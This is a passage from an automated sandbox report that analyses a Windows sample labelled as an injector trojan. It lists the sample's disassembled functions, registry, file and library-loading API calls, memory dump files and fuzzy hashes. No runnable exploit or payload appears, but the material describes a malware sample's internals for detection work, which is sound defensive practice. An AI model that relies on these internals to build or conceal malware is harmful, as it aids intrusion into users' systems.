                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                            • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Enum$CloseValue
                                            • String ID:
                                            • API String ID: 397863658-0
                                            • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                            • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                            • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                            • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                            Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                            • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                            • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                            • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                            • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                            • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                            • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                            • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                            Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CloseDeleteValue
                                            • String ID:
                                            • API String ID: 2831762973-0
                                            • Opcode ID: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                            • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                            • Opcode Fuzzy Hash: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                            • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                            Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 00405393
                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004053DF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: InitializeMessageSendUninitialize
                                            • String ID:
                                            • API String ID: 2896919175-0
                                            • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                            • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                            • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                            • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                            Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                            • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                            • Opcode Fuzzy Hash: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                            • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                            Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                            • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                            • Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                            • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                            Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                              • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                              • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                              • Part of subcall function 004065B6: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                            • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                            • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                            • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                            Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                            Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                            • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                            • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                            Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                            • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                            • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                            Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                            • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                            • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                            • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                            Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
